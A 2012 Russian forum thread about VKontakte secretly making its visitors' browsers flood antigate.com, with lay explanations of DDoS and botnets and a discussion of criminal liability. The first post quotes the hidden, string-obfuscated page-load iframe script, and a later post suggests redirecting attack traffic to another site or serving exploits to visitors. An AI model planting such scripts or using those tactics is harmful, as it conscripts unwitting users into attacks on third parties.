Трамвайчик

    Главная : Новости : Связь
Новости киноляповНовости маразмовIMHO Добавить в Избранное Сделать стартовой Назад   

Автор Тема: ВКонтакте бодается с Антигейтом  (Прочитано 3377 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн Почта сайта

  • Moderator
  • Ветеран
  • *****
  • Сообщений: 21661
    • Просмотр профиля
ВКонтакте бодается с Антигейтом
« : 26 Апрель 2012, 14:17:10 »
Сегодня ВКонтакте внедрил на всех страницах скрипт:

<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()">

function _test() {
  var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write('<script>this.location="http://ant' 'iga' 'te.com/i' 'n.php?' 'firs' 't_an' 'd_la' 'st_wa' 'rnin' 'g=o' 'n";</sc' 'ript>');setTimeout(re.pbind(fr),1000);
}

Проще говоря, Дуров стал дидосить сайт antigate.com
Естественно, сайт антигейта лег под напором пользователей ВК, даже не подозревающих, что их усилиями нарушается Статья 274 УК РФ.

Блин, иногда Дуров напоминает обезьяну с гранатой.

Спамеры с антигейта отбились от атаки - сделали перенаправление на сайт xvideos :), после чего код со страниц ВК стал вести на порно.

Идиоты. Я бы на их месте срочно продал мощный контактовский трафик ботнетам.

В настоящее время код убран.
Тыгыдымс-тыгыдымс

Оффлайн sergei

  • Ветеран
  • *****
  • Сообщений: 5994
    • Просмотр профиля
    • E-mail
Re: ВКонтакте бодается с Антигейтом
« Ответ #1 : 26 Апрель 2012, 16:48:17 »
 Наверное одному мне хорощо, я тут просто ни одного слова не понял. Я молодец!

Оффлайн Mapьяна

  • Постоялец
  • ***
  • Сообщений: 193
    • Просмотр профиля
Re: ВКонтакте бодается с Антигейтом
« Ответ #2 : 26 Апрель 2012, 16:50:06 »
А мне было нехорошо от этого же.  :)

Оффлайн Почта сайта

  • Moderator
  • Ветеран
  • *****
  • Сообщений: 21661
    • Просмотр профиля
Re: ВКонтакте бодается с Антигейтом
« Ответ #3 : 26 Апрель 2012, 18:35:24 »
Короче, сейчас объясняю более простым языком. Но потребуется немного времени, чтобы оформить новость более литературно :)
Тыгыдымс-тыгыдымс

Оффлайн Почта сайта

  • Moderator
  • Ветеран
  • *****
  • Сообщений: 21661
    • Просмотр профиля
Re: ВКонтакте бодается с Антигейтом
« Ответ #4 : 26 Апрель 2012, 20:01:02 »
Сайты в интернете - это своего рода папки с файлами, хранящиеся на каком-либо компьютере (такие компьютеры называются серверами) или группе компьютеров (серверный кластер). Если сайт посещают много пользователей, приходится расширять пропускной канал, т.к. при большом числе обращений к серверу он может «упасть», не справиться с нагрузкой.

Сидя у себя дома, вы, как правило, являетесь единственным пользователем своего ПК. Вы можете работать в нескольких программах одновременно, открывать или закрывать несколько файлов, но как единственный пользователь, практически не напрягаете свой комп (пока не садитесь рубиться в «Старкрафт» или в другую ресурсоёмкую цацу, гы). Тем не менее, ваш комп способен на большее, к нему можно подключить сотни пользователей, и для простых операций он эту сотню выдержит, но будет подтормаживать, когда будет происходить запись/чтение информации с диска (это будет происходить обязательно), т.к. диск обычно всего один, а желающих открыть/закрыть файлы будет много. Если число пользователей вашего ПК будет неограниченно расти, он в конце концов зависнет (отказ в работе системы), не справившись с запросами пользователей.

Примерно то же происходит и с серверными кластерами, если на них сваливается непомерная нагрузка, выше заявленной расчетной. Фактически, путем нагона посетителей можно завалить любой сайт, что и делается различными дидосерами (DDoS-атака - Distributed Denial of Service, распределенная атака типа «отказ в обслуживании») за весьма нескромную плату.

Как правило, атакуют сайты так называемые ботнеты - сети из зараженных вирусами ПК по всему миру, получающие команду из единого центра срочно зайти на сайт жертвы (по-тихому, чтобы юзер не догадался, что его ПК - зомби). Ботнеты могут быть неприлично большими. По разным оценкам, размеры только одного ботнета StormWorm могли составлять от 50 тысяч до 10 миллионов зомби-машин.
Теперь представьте, как в одночасье вся эта куча пользователей начинает долбиться на какой-либо сайт.

Отбиться от такой атаки невозможно. Спасает лишь то, что число ПК в ботнетах обычно завышается, а недостаток числа зомби компенсируется специальным софтом, который можно вычислить и отфильтровать, перекрывая доступ для ботов. Есть множество систем защиты от DDoS-атак, все они с переменным успехом работают, но при чистой, сферической атаке в вакууме защита будет бессильна, т.к. будет невозможно определить, кто из посетителей зомби, а кто реальный человек.

Соцсеть Вконтакте на сегодня крупнейшая в России. Ее первый боевой опыт в качестве ботнета уже засветился несколько лет назад при атаке на Премию Рунета. Тогда Дуров обиделся на организаторов Премии, причем СПРАВЕДЛИВО обиделся (те продвигали Одноклассников, их спонсоров), но поступил как дитя: впаял на сайт ВК код, тайно открывающий сайт Премии Рунета при просмотре каждой вконтактовской странички. Для юзеров ВК это было незаметно, но зато обращения к сайту были хорошо заметны для владельцев сайта «Премия Рунета», который слег от шквала посетителей. Этот детский проступок тогда замяли, поскольку у самой Премии Рунета было рыльце в пушку.
Сегодня была аналогичная попытка хлопнуть дверью, но уже для сайта Антигейт (контора с сомнительной спаммерской репутацией).

Можно подумать, что Дуров - этакий народный мститель, карающий плохишей, но как-то все не очень легитимно получается. Хотят ли его пользователи поучаствовать в его разборках, он никого не спросил, повел себя по принципу «хозяин - барин». И, кстати, большинство айтишников такой поступок осуждает как раз из-за подобного «барства».
Вот представьте, если бы владелец компании «Тойота» в чем-то возненавидел владельца компании «Мазда» и после этого поставил бы во все выпускаемые машины своей марки девайс, вырубающий фары у всех «Мазд» вокруге. Хорошая месть? Вот то-то и оно. Я считаю, что пользователи без их ведома никак не должны участвовать в разборках, даже если Дуров тысячи раз прав относительно зловредности Антигейта.

Я тут сказал, что отбиться от чистых DDoS-атак невозможно, но есть способ насолить атакующему. Это не защита, конечно, то есть сайт жертвы при таком раскладе все равно не будет работать, но поиздеваться над атакующим вполне возможно.

1. Реально.
Сделать перенаправление (прямой редирект) со своего сайта на какой-нибудь важный государственный сайт. Атака перейдет на этот сайт. Если там окажутся хорошие спецы, атакующего найдут быстро.
У нас в РФ был похожий случай, но перенаправление было не на госсайт (там понятно, одни лопухи), а на сайт Яндекса. Яндекс положить очень трудно, у них тысячи машин, но даже Яндекс тогда лег. Щепки полетели во все стороны. Невиновных наказали, непричастных наградили. Шучу.

2. Нереально.
Подсунуть по этому адресу загрузку эксплойта (трояна) для пользователей ВК. Об этом все твердят, что можно было сделать и так, но я сильно сомневаюсь, что эксплойт будет загружен при упавшем сервере. То есть, сначала нужно будет расширить пропускную способность канала, а это может оказаться затратно.
« Последнее редактирование: 26 Апрель 2012, 20:50:09 от Почта сайта »
Тыгыдымс-тыгыдымс

Оффлайн sergei

  • Ветеран
  • *****
  • Сообщений: 5994
    • Просмотр профиля
    • E-mail
Re: ВКонтакте бодается с Антигейтом
« Ответ #5 : 26 Апрель 2012, 20:55:57 »
 Другое дело.... спс, разжевал как детям, ещё раз спс )))))    Хотя кто такой Дуров я не знаю и знать не желаю)

Оффлайн Mapьяна

  • Постоялец
  • ***
  • Сообщений: 193
    • Просмотр профиля
Re: ВКонтакте бодается с Антигейтом
« Ответ #6 : 27 Апрель 2012, 08:24:43 »
Вот почти все понятно.
Для чего это:

делается различными дидосерами (DDoS-атака - Distributed Denial of Service, распределенная атака типа «отказ в обслуживании») за весьма нескромную плату.

Как правило, атакуют сайты так называемые ботнеты - сети из зараженных вирусами ПК по всему миру, получающие команду из единого центра срочно зайти на сайт жертвы (по-тихому, чтобы юзер не догадался, что его ПК - зомби).
?

Lazy Crazy

  • Гость
Re: ВКонтакте бодается с Антигейтом
« Ответ #7 : 27 Апрель 2012, 08:38:40 »
Вот почти все понятно.
Для чего это…?
Допустим, у вас бизнес, построенный на веб-сервисе (онлайн-магазинчик какой-нибудь, к примеру). И в один «прекрасный» момент к вашему серверу начинают обращаться одновременно тысячи компьютеров, чьи владельцы прохлопали троянчик, и ваш сервер ложится. Нет заказов, нет оборота, вы подсчитываете убытки и подыскиваете крючок понадёжнее и верёвку помягче. И тут к вам обращается некто, предлагающий прекратить всё это безобразие за определённое вознаграждение. Или не обращается - если ему уже заплатили ваши конкуренты…

Lazy Crazy

  • Гость
Re: ВКонтакте бодается с Антигейтом
« Ответ #8 : 27 Апрель 2012, 08:47:06 »
пользователей ВК, даже не подозревающих, что их усилиями нарушается Статья 274 УК РФ.

Наша юриспруденция непредсказуема, но, говорят, формально это не попадает под данную статью…

Цитировать
Статья 274. Нарушение правил эксплуатации средств хранения, обработки или передачи компьютерной информации и информационно-телекоммуникационных сетей
[Уголовный кодекс РФ] [Глава 28] [Статья 274]

1. Нарушение правил эксплуатации средств хранения, обработки или передачи охраняемой компьютерной информации либо информационно-телекоммуникационных сетей и оконечного оборудования, а также правил доступа к информационно-телекоммуникационным сетям, повлекшее уничтожение, блокирование, модификацию либо копирование компьютерной информации, причинившее крупный ущерб, -

наказывается штрафом в размере до пятисот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо ограничением свободы на срок до двух лет, либо принудительными работами на срок до двух лет, либо лишением свободы на тот же срок.

2. Деяние, предусмотренное частью первой настоящей статьи, если оно повлекло тяжкие последствия или создало угрозу их наступления, -

наказывается принудительными работами на срок до пяти лет либо лишением свободы на тот же срок.

Оффлайн Почта сайта

  • Moderator
  • Ветеран
  • *****
  • Сообщений: 21661
    • Просмотр профиля
Re: ВКонтакте бодается с Антигейтом
« Ответ #9 : 27 Апрель 2012, 14:29:54 »
Всего статей на эту тему три: 272, 273, 274

Лучше всего подходит 273, но судят почему-то по 274.
Тыгыдымс-тыгыдымс

Оффлайн Почта сайта

  • Moderator
  • Ветеран
  • *****
  • Сообщений: 21661
    • Просмотр профиля
Re: ВКонтакте бодается с Антигейтом
« Ответ #10 : 27 Апрель 2012, 14:37:55 »
Ну, номер статьи я для красного словца написал, но теоретически-юридически к Дурову прикопаться можно было бы, если б:
1. Жертва в срочном порядке подняла свои серваки и подсунула юзерам ВК эксплойт.
2. Нашлись терпилы, пострадавшие от эксплойта.
Тогда бы Дуров стал распространителем вредоносного ПО.
Но это все "если бы" да "как бы"...
Тыгыдымс-тыгыдымс

 

Страница сгенерирована за 0.167 секунд. Запросов: 22.

Назад Наверх
 
   © 2024 Генрих Лиговский